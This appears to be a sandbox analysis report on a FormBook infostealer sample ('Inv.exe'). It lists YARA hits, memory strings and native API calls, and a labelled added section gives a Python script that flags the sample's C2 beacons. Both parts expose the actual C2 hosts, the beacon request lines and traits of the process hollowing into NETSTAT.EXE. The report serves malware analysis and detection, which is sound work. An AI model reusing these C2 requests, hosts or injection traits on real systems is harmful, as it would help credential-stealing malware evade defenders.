  X-LiteSpeed-Cache-Control: public,max-age=3600
  X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_
  X-Litespeed-Cache: miss
  Transfer-Encoding: chunked
  Date: Wed, 13 Jan 2021 20:27:17 GMT
  Server: LiteSpeed
  Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><he (chunked WordPress "Page not found" body for abccarpetcare.com; hex dump of the body not reproduced)
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
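
The four GET requests in this section share one shape: the path is the decrypted C2 path "/hko6/", the query carries two parameters with random-looking names and base64-like values, the headers are just Host and "Connection: close" with no User-Agent (the "HTTP GET or POST without a user agent" signature), and the Host rotates through domains from the decrypted configuration while the OHiLR value jJBpdVbhUrMh9TJP stays fixed across all of them. The following is an added detection example, not part of the report or of Joe Sandbox, that scores request records on those traits and finds the fixed token shared across hosts. REQUESTS is constructed from the traffic lines above plus one benign request for contrast; the record shape (request line plus a header dict) is an assumption about the proxy or PCAP export being fed in.

```python
"""Flag FormBook-style check-in beacons in HTTP request records.

Added example, not part of the report. REQUESTS is constructed from the
report's traffic lines plus one benign request; the record shape is assumed.
"""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Hosts from the sample's decrypted configuration (subset seen in the traffic).
CONFIG_HOSTS = {"www.nationshiphop.com", "www.millcityloam.com",
                "www.achonabu.com", "www.a-zsolutionsllc.com"}
C2_PATH = "/hko6/"

REQUESTS = [
    ("GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1",
     {"Host": "www.millcityloam.com", "Connection": "close"}),
    ("GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1",
     {"Host": "www.achonabu.com", "Connection": "close"}),
    ("GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1",
     {"Host": "www.nationshiphop.com", "Connection": "close"}),
    # Constructed benign request: real UA, ordinary path, no blob parameters.
    ("GET /index.html?page=2 HTTP/1.1",
     {"Host": "www.example.com", "Connection": "keep-alive",
      "User-Agent": "Mozilla/5.0"}),
]

B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def split_query(query):
    """Split a raw query without percent- or plus-decoding.

    urllib.parse.parse_qsl would turn '+' into a space and break the check.
    """
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((name, value))
    return pairs


def looks_base64(value):
    """True if the value uses only the base64 alphabet and decodes cleanly."""
    if not B64_VALUE.match(value):
        return False
    try:
        base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def score_request(first_line, headers):
    """Return (score, reasons); each matched beacon trait adds one point."""
    _method, target, _version = first_line.split(" ", 2)
    url = urlsplit(target)
    params = split_query(url.query)
    reasons = []
    if not any(k.lower() == "user-agent" for k in headers):
        reasons.append("no User-Agent header")
    if headers.get("Connection", "").lower() == "close":
        reasons.append("Connection: close")
    if url.path == C2_PATH:
        reasons.append("path equals decrypted C2 path")
    if headers.get("Host", "").lower() in CONFIG_HOSTS:
        reasons.append("Host is in the decrypted configuration")
    if len(params) == 2 and all(looks_base64(v) for _, v in params):
        reasons.append("two base64-like query blobs")
    return len(reasons), reasons


def shared_tokens(requests):
    """Map (name, value) query pairs to the Hosts they were sent to.

    Only pairs seen under more than one Host are returned: a value that stays
    constant while the Host rotates ties the requests to one infected machine.
    """
    seen = {}
    for first_line, headers in requests:
        target = first_line.split(" ", 2)[1]
        for pair in split_query(urlsplit(target).query):
            seen.setdefault(pair, set()).add(headers.get("Host", "").lower())
    return {pair: hosts for pair, hosts in seen.items() if len(hosts) > 1}


def triage(requests, threshold=4):
    """Indexes of requests whose trait score reaches the threshold."""
    return [i for i, (line, hdrs) in enumerate(requests)
            if score_request(line, hdrs)[0] >= threshold]


if __name__ == "__main__":
    for i, (line, hdrs) in enumerate(REQUESTS):
        print(i, hdrs["Host"], score_request(line, hdrs))
    print("shared tokens:", shared_tokens(REQUESTS))
```

Two points follow from the report itself. The requests are issued by a hollowed system process (NETSTAT.EXE, per the "System process connects to network" signature), so process-based allow-listing at the proxy will not help; the request shape and the shared token are what survive. And the 404 above came back carrying another site's WordPress headers (the Link header points at abccarpetcare.com), which is what contacting a decoy or parked host on shared hosting looks like: a benign response to a beacon is not evidence that the traffic is benign.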

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A060 NtClose
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A110 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419F30 NtCreateFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FE0 NtReadFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A08A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FDA NtReadFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FDC NtReadFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019899A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019898F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019895D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019897A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019896E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019899D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989950 NtQueueApcThread
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019898A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989820 NtEnumerateKey
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198B040 NtSuspendThread
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989B00 NtSetValueKey
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A10 NtQuerySection
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019895F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198AD30 NtSetContextThread
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989560 NtWriteFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989FE0 NtCreateMutant
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989770 NtSetInformationFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A770 NtOpenThread
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989760 NtOpenProcess
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019896D0 NtCreateKey
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E599A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E596E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E596D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E595D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A20 NtResumeThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A10 NtQuerySection
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59B00 NtSetValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E598F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E598A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5B040 NtSuspendThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59820 NtEnumerateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E599D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59950 NtQueueApcThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E597A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59760 NtOpenProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A770 NtOpenThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59770 NtSetInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E595F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59560 NtWriteFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A060 NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A110 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369F30 NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FE0 NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A08A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FDC NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FDA NtReadFile
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123D929
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012451BC
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01247991
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012455E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01240432
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0124683C
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012460C0
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01245B50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0040102F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00401030
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D1EF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041E18E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041DAA3
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00402D87
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409E40
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409E3C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D6FE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123D929
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123A951
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012451BC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01247991
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0124683C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012460C0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01245B50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012455E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01240432
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194F900
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B090
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A120A8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01002
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197EBB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0DBD2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A12B28
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A122AE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195D5E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A12D07
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01940D20
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A11D55
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195841F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A11FF1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A12EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE22AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED03DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDDBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE2B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE28EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE20A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EEE824
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE2EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E36E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDD616
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE1FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EEDFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDD466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE25DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE1D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E10D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE2D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036E18E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D1EF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036DAAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00352D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00352D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00359E3C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00359E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D6FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00352FB0
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0123BFC3 appears 38 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01236EF1 appears 84 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01239160 appears 64 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01236F06 appears 36 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01237021 appears 40 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0194B150 appears 35 times
